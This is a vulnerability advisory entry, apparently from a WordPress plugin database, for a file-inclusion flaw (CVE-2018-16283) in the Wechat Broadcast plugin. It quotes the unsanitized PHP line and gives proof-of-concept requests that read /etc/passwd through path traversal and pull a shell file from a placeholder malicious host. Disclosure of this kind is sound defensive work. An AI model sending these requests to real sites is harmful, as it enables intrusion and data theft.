Wechat Broadcast <= 1.2.0 – Local/Remote File Inclusion | CVE 2018-16283 | Plugin Vulnerabilities

Description

This bug was found in the file:

/wechat-broadcast/wechat/Image.php

echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');

The parameter "url" it is not sanitized allowing include local or remote
files

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

Proof of Concept

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

Remote File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=
http://malicious.url/shell.txt

Affects Plugins

wechat-broadcast

No known fix

References

CVE

Exploitdb

URL

https://seclists.org/fulldisclosure/2018/Sep/32

Classification

Type

LFI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Manuel García Cárdenas

Submitter

Jonas Lejon

Submitter website

https://wpscans.com

Submitter twitter

Verified

No

WPVDB ID

3e434618-087b-4ef9-a63b-8b378c748390

Timeline

Publicly Published

2018-09-19 (about 7 years ago)

Added

2018-09-24 (about 7 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2025-08-27

Title

Printeers Print & Ship <= 1.17.0 - Unauthenticated Path Traversal

Published

2026-04-16

Title

JetBackup < 3.1.20.3 - Authenticated (Administrator+) Arbitrary Directory Deletion via Path Traversal in 'fileName' Parameter

Published

2025-09-25

Title

Backuply < 1.4.9 - Admin+ Arbitrary File Deletion

Published

2021-11-15

Title

All-In-One-Gallery < 2.5.0 - Admin+ Local File Inclusion

Published

2015-04-14

Title

Crayon Syntax Highlighter < 2.7.0 - Local File Disclosure